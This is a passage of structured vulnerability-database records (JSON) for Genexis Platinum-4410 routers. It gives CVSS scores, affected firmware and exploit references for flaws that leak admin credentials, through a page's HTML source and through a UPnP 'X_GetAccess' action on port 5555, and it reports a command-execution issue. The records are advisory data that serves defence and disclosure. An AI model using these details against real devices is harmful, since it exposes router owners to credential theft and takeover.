"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:genexis:platinum-4410_firmware:1.28:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:genexis:platinum-4410:v2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-6170"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Husinul Sanub",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-245"
}
],
"trust": 0.6
},
"cve": "CVE-2020-6170",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2020-6170",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-14704",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2020-6170",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-6170",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2020-14704",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202001-245",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-14704"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001334"
},
{
"db": "NVD",
"id": "CVE-2020-6170"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-245"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An authentication bypass vulnerability on Genexis Platinum-4410 v2.1 P4410-V2 1.28 devices allows attackers to obtain cleartext credentials from the HTML source code of the cgi-bin/index2.asp URI. Genexis Platinum-4410 The device contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Genexis Platinum-4410 is a WiFi 300/750 Mbps three-network integrated GPON ONT series router. \n\r\n\r\nGenexis Platinum-4410 2.1 P4410-V2 1.28 has an authentication bypass vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-6170"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001334"
},
{
"db": "CNVD",
"id": "CNVD-2020-14704"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-6170",
"trust": 3.0
},
{
"db": "PACKETSTORM",
"id": "156075",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001334",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-14704",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "47961",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202001-245",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-14704"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001334"
},
{
"db": "NVD",
"id": "CVE-2020-6170"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-245"
}
]
},
"id": "VAR-202001-1817",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-14704"
}
],
"trust": 1.3232142850000002
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-14704"
}
]
},
"last_update_date": "2023-12-18T13:37:57.802000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://genexis.co.in/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-001334"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.0
},
{
"problemtype": "CWE-306",
"trust": 1.0
},
{
"problemtype": "CWE-287",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-001334"
},
{
"db": "NVD",
"id": "CVE-2020-6170"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/156075/genexis-platinum-4410-2.1-authentication-bypass.html"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-6170"
},
{
"trust": 1.0,
"url": "https://medium.com/%40husinulzsanub/exploiting-router-authentication-through-web-interface-68660c708206"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-6170"
},
{
"trust": 0.6,
"url": "https://medium.com/@husinulzsanub/exploiting-router-authentication-through-web-interface-68660c708206"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/47961"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-14704"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001334"
},
{
"db": "NVD",
"id": "CVE-2020-6170"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-245"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-14704"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001334"
},
{
"db": "NVD",
"id": "CVE-2020-6170"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-245"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-02-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-14704"
},
{
"date": "2020-01-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-001334"
},
{
"date": "2020-01-08T06:15:12.383000",
"db": "NVD",
"id": "CVE-2020-6170"
},
{
"date": "2020-01-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-245"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-02-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-14704"
},
{
"date": "2020-01-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-001334"
},
{
"date": "2023-11-07T03:24:13.047000",
"db": "NVD",
"id": "CVE-2020-6170"
},
{
"date": "2022-01-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-245"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-245"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Genexis Platinum-4410 Authentication vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-001334"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "access control error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-245"
}
],
"trust": 0.6
}
}
VAR-202011-0712
Vulnerability from variot - Updated: 2023-12-18 13:27UPNP Service listening on port 5555 in Genexis Platinum 4410 Router V2.1 (P4410-V2–1.34H) has an action 'X_GetAccess' which leaks the credentials of 'admin', provided that the attacker is network adjacent. Genexis Platinum 4410 Router Contains a vulnerability in the transmission of important information in clear text.Information may be obtained
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202011-0712",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "platinum 4410",
"scope": "eq",
"trust": 1.0,
"vendor": "genexis",
"version": "p4410-v2-1.34h"
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": null
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": "genexis platinum-4410 firmware 2.1 (p4410-v2-1.34h)"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-013954"
},
{
"db": "NVD",
"id": "CVE-2020-25988"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:genexis:platinum_4410_firmware:p4410-v2-1.34h:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:genexis:platinum_4410:2.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25988"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nitesh Surana",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202011-1539"
}
],
"trust": 0.6
},
"cve": "CVE-2020-25988",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2020-25988",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2020-25988",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-25988",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202011-1539",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-013954"
},
{
"db": "NVD",
"id": "CVE-2020-25988"
},
{
"db": "CNNVD",
"id": "CNNVD-202011-1539"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "UPNP Service listening on port 5555 in Genexis Platinum 4410 Router V2.1 (P4410-V2\u20131.34H) has an action \u0027X_GetAccess\u0027 which leaks the credentials of \u0027admin\u0027, provided that the attacker is network adjacent. Genexis Platinum 4410 Router Contains a vulnerability in the transmission of important information in clear text.Information may be obtained",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25988"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-013954"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-25988",
"trust": 2.4
},
{
"db": "EXPLOIT-DB",
"id": "49075",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2020-013954",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202011-1539",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-013954"
},
{
"db": "NVD",
"id": "CVE-2020-25988"
},
{
"db": "CNNVD",
"id": "CNNVD-202011-1539"
}
]
},
"id": "VAR-202011-0712",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.44642857
},
"last_update_date": "2023-12-18T13:27:54.241000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.gxgroup.eu/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-013954"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-319",
"trust": 1.0
},
{
"problemtype": "Sending important information in clear text (CWE-319) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-013954"
},
{
"db": "NVD",
"id": "CVE-2020-25988"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "https://www.exploit-db.com/exploits/49075"
},
{
"trust": 1.6,
"url": "https://github.com/ideaengine007/randomstuffs/blob/main/version_vulnerable.png"
},
{
"trust": 1.6,
"url": "https://youtu.be/gomlavacqsi"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25988"
},
{
"trust": 1.0,
"url": "https://medium.com/%40niteshsurana/424f0db73129"
},
{
"trust": 0.8,
"url": "https://github.com/n1teshsurana/randomstuffs/blob/main/version_vulnerable.png"
},
{
"trust": 0.6,
"url": "https://medium.com/@niteshsurana/424f0db73129"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-013954"
},
{
"db": "NVD",
"id": "CVE-2020-25988"
},
{
"db": "CNNVD",
"id": "CNNVD-202011-1539"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2020-013954"
},
{
"db": "NVD",
"id": "CVE-2020-25988"
},
{
"db": "CNNVD",
"id": "CNNVD-202011-1539"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-013954"
},
{
"date": "2020-11-17T20:15:11.160000",
"db": "NVD",
"id": "CVE-2020-25988"
},
{
"date": "2020-11-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202011-1539"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-16T06:13:00",
"db": "JVNDB",
"id": "JVNDB-2020-013954"
},
{
"date": "2023-11-07T03:20:28.530000",
"db": "NVD",
"id": "CVE-2020-25988"
},
{
"date": "2020-12-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202011-1539"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202011-1539"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Genexis\u00a0Platinum\u00a04410\u00a0Router\u00a0 Vulnerability in plaintext transmission of important information in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-013954"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202011-1539"
}
],
"trust": 0.6
}
}
VAR-202011-1584
Vulnerability from variot - Updated: 2022-05-04 09:50Genexis is a leading European product and technology supplier dedicated to providing and improving the delivery of fiber optic broadband connections for communication operators and service providers.
Genexis Platinum-4410 and FHTC-201709142001 have command execution vulnerabilities. Attackers can use the vulnerabilities to gain server permissions.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202011-1584",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "platinum",
"scope": "eq",
"trust": 0.6,
"vendor": "genexis",
"version": "4410"
},
{
"model": "fhtc-201709142001",
"scope": null,
"trust": 0.6,
"vendor": "genexis",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-58840"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.1,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CNVD-2020-58840",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:H/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2020-58840",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-58840"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Genexis is a leading European product and technology supplier dedicated to providing and improving the delivery of fiber optic broadband connections for communication operators and service providers.\n\r\n\r\nGenexis Platinum-4410 and FHTC-201709142001 have command execution vulnerabilities. Attackers can use the vulnerabilities to gain server permissions.",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-58840"
}
],
"trust": 0.6
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-58840",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-58840"
}
]
},
